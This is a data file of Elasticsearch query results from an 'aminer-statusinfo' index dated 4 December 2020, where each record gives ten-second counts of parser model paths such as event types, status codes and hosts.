{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"xzPqLXYBIkOurnXXVYfA","_score":1.0,"_source":{"FromTime":1.607088090628122E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":198,"/parser/model/type_str":16702,"/parser/model/classification":0,"/parser/model/status_code":31,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:21:40.697Z","ToTime":1.607088100628174E9,"fromtimestamp":"2020-12-04T13:21:30.628Z","totimestamp":"2020-12-04T13:21:40.628Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"3zPrLXYBIkOurnXXK4c3","_score":1.0,"_source":{"FromTime":1.607088145306266E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":426,"/parser/model/type_str":51066,"/parser/model/php":0,"/parser/model/status_code":139,"/parser/model/host":47,"/parser/model/sp":4},"timestamp":"2020-12-04T13:22:35.344Z","ToTime":1.607088155306352E9,"fromtimestamp":"2020-12-04T13:22:25.306Z","totimestamp":"2020-12-04T13:22:35.306Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"4zPrLXYBIkOurnXXUodo","_score":1.0,"_source":{"FromTime":1.607088155324363E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":169,"/parser/model/type_str":22707,"/parser/model/php":0,"/parser/model/status_code":62,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:22:45.377Z","ToTime":1.607088165324514E9,"fromtimestamp":"2020-12-04T13:22:35.324Z","totimestamp":"2020-12-04T13:22:45.324Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"6jPrLXYBIkOurnXXe4cc","_score":1.0,"_source":{"FromTime":1.607088165758297E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":378,"/parser/model/type_str":35426,"/parser/model/php":0,"/parser/model/status_code":80,"/parser/model/host":15,"/parser/model/sp":0},"timestamp":"2020-12-04T13:22:55.797Z","ToTime":1.607088175758337E9,"fromtimestamp":"2020-12-04T13:22:45.758Z","totimestamp":"2020-12-04T13:22:55.758Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"7jPrLXYBIkOurnXXpIcU","_score":1.0,"_source":{"FromTime":1.607088176247121E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":35,"/parser/model/type_str":2684,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":7,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:06.284Z","ToTime":1.607088186247198E9,"fromtimestamp":"2020-12-04T13:22:56.247Z","totimestamp":"2020-12-04T13:23:06.247Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"8zPrLXYBIkOurnXXzYe8","_score":1.0,"_source":{"FromTime":1.607088186891987E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":3552,"/parser/model/php":0,"/parser/model/status_code":8,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:16.949Z","ToTime":1.607088196892045E9,"fromtimestamp":"2020-12-04T13:23:06.891Z","totimestamp":"2020-12-04T13:23:16.892Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"-DPrLXYBIkOurnXX9Yed","_score":1.0,"_source":{"FromTime":1.60708819712081E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":39,"/parser/model/type_str":1110,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:27.157Z","ToTime":1.607088207120882E9,"fromtimestamp":"2020-12-04T13:23:17.120Z","totimestamp":"2020-12-04T13:23:27.120Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_TPsLXYBIkOurnXXHocN","_score":1.0,"_source":{"FromTime":1.607088207472226E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":1741,"/parser/model/php":0,"/parser/model/status_code":9,"/parser/model/host":11,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:37.510Z","ToTime":1.607088217472315E9,"fromtimestamp":"2020-12-04T13:23:27.472Z","totimestamp":"2020-12-04T13:23:37.472Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ATPsLXYBIkOurnXXSIgE","_score":1.0,"_source":{"FromTime":1.607088218216699E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":24,"/parser/model/type_str":4167,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:48.252Z","ToTime":1.607088228216758E9,"fromtimestamp":"2020-12-04T13:23:38.216Z","totimestamp":"2020-12-04T13:23:48.216Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"CDPsLXYBIkOurnXXb4go","_score":1.0,"_source":{"FromTime":1.607088228236653E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:23:58.273Z","ToTime":1.607088238236712E9,"fromtimestamp":"2020-12-04T13:23:48.236Z","totimestamp":"2020-12-04T13:23:58.236Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"DDPsLXYBIkOurnXXl4jN","_score":1.0,"_source":{"FromTime":1.607088238639867E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":36,"/parser/model/type_str":2231,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:08.677Z","ToTime":1.607088248639983E9,"fromtimestamp":"2020-12-04T13:23:58.639Z","totimestamp":"2020-12-04T13:24:08.639Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"EDPsLXYBIkOurnXXv4hE","_score":1.0,"_source":{"FromTime":1.607088248719976E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":70,"/parser/model/type_str":5910,"/parser/model/php":0,"/parser/model/status_code":30,"/parser/model/host":9,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:18.781Z","ToTime":1.60708825872006E9,"fromtimestamp":"2020-12-04T13:24:08.719Z","totimestamp":"2020-12-04T13:24:18.720Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"FjPsLXYBIkOurnXX54gp","_score":1.0,"_source":{"FromTime":1.607088258956716E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":40,"/parser/model/type_str":1044,"/parser/model/php":0,"/parser/model/status_code":12,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:28.994Z","ToTime":1.607088268956817E9,"fromtimestamp":"2020-12-04T13:24:18.956Z","totimestamp":"2020-12-04T13:24:28.956Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"GjPtLXYBIkOurnXXEIj5","_score":1.0,"_source":{"FromTime":1.607088269659532E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":35,"/parser/model/type_str":3839,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:39.697Z","ToTime":1.607088279659616E9,"fromtimestamp":"2020-12-04T13:24:29.659Z","totimestamp":"2020-12-04T13:24:39.659Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"HzPtLXYBIkOurnXXOYhP","_score":1.0,"_source":{"FromTime":1.607088279986282E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":20,"/parser/model/type_str":1729,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:50.024Z","ToTime":1.607088289986358E9,"fromtimestamp":"2020-12-04T13:24:39.986Z","totimestamp":"2020-12-04T13:24:49.986Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"JTPtLXYBIkOurnXXYIjV","_score":1.0,"_source":{"FromTime":1.607088290105456E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":488,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":2},"timestamp":"2020-12-04T13:25:00.142Z","ToTime":1.607088300105532E9,"fromtimestamp":"2020-12-04T13:24:50.105Z","totimestamp":"2020-12-04T13:25:00.105Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"KjPtLXYBIkOurnXXiIhn","_score":1.0,"_source":{"FromTime":1.607088300236322E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":16,"/parser/model/type_str":405,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:10.273Z","ToTime":1.607088310236405E9,"fromtimestamp":"2020-12-04T13:25:00.236Z","totimestamp":"2020-12-04T13:25:10.236Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"LjPtLXYBIkOurnXXsogA","_score":1.0,"_source":{"FromTime":1.607088310881677E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":3525,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:20.921Z","ToTime":1.607088320881773E9,"fromtimestamp":"2020-12-04T13:25:10.881Z","totimestamp":"2020-12-04T13:25:20.881Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"NDPtLXYBIkOurnXX24gM","_score":1.0,"_source":{"FromTime":1.607088321391445E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":2498,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:31.429Z","ToTime":1.607088331391522E9,"fromtimestamp":"2020-12-04T13:25:21.391Z","totimestamp":"2020-12-04T13:25:31.391Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ODPuLXYBIkOurnXXAoiV","_score":1.0,"_source":{"FromTime":1.607088331512345E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":12,"/parser/model/type_str":312,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:41.550Z","ToTime":1.607088341512401E9,"fromtimestamp":"2020-12-04T13:25:31.512Z","totimestamp":"2020-12-04T13:25:41.512Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"PTPuLXYBIkOurnXXKogl","_score":1.0,"_source":{"FromTime":1.607088341638619E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":490,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:51.677Z","ToTime":1.60708835163873E9,"fromtimestamp":"2020-12-04T13:25:41.638Z","totimestamp":"2020-12-04T13:25:51.638Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"QzPuLXYBIkOurnXXUYiA","_score":1.0,"_source":{"FromTime":1.607088351700008E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":178,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:01.752Z","ToTime":1.607088361700072E9,"fromtimestamp":"2020-12-04T13:25:51.700Z","totimestamp":"2020-12-04T13:26:01.700Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"RzPuLXYBIkOurnXXeoh6","_score":1.0,"_source":{"FromTime":1.607088362206958E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":13,"/parser/model/type_str":2781,"/parser/model/php":0,"/parser/model/status_code":6,"/parser/model/host":5,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:12.243Z","ToTime":1.607088372207032E9,"fromtimestamp":"2020-12-04T13:26:02.206Z","totimestamp":"2020-12-04T13:26:12.207Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"TTPuLXYBIkOurnXXoojy","_score":1.0,"_source":{"FromTime":1.607088372563724E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":2015,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:22.602Z","ToTime":1.607088382563822E9,"fromtimestamp":"2020-12-04T13:26:12.563Z","totimestamp":"2020-12-04T13:26:22.563Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"UTPuLXYBIkOurnXXyoiq","_score":1.0,"_source":{"FromTime":1.607088382723041E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":19,"/parser/model/type_str":618,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:32.771Z","ToTime":1.607088392723119E9,"fromtimestamp":"2020-12-04T13:26:22.723Z","totimestamp":"2020-12-04T13:26:32.723Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"VTPuLXYBIkOurnXX8Yjy","_score":1.0,"_source":{"FromTime":1.607088392788693E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":151,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:42.826Z","ToTime":1.607088402788764E9,"fromtimestamp":"2020-12-04T13:26:32.788Z","totimestamp":"2020-12-04T13:26:42.788Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"WzPvLXYBIkOurnXXGYho","_score":1.0,"_source":{"FromTime":1.607088402876697E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":319,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:52.928Z","ToTime":1.607088412876761E9,"fromtimestamp":"2020-12-04T13:26:42.876Z","totimestamp":"2020-12-04T13:26:52.876Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"YDPvLXYBIkOurnXXQYhb","_score":1.0,"_source":{"FromTime":1.607088413096821E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":1141,"/parser/model/php":0,"/parser/model/status_code":4,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:03.155Z","ToTime":1.607088423096905E9,"fromtimestamp":"2020-12-04T13:26:53.096Z","totimestamp":"2020-12-04T13:27:03.096Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ZTPvLXYBIkOurnXXaYhw","_score":1.0,"_source":{"FromTime":1.607088423360947E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":1073,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:13.417Z","ToTime":1.607088433361018E9,"fromtimestamp":"2020-12-04T13:27:03.360Z","totimestamp":"2020-12-04T13:27:13.361Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ajPvLXYBIkOurnXXkYhn","_score":1.0,"_source":{"FromTime":1.607088433607134E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":19,"/parser/model/type_str":988,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:23.648Z","ToTime":1.607088443607235E9,"fromtimestamp":"2020-12-04T13:27:13.607Z","totimestamp":"2020-12-04T13:27:23.607Z","version":"1"}}]}} 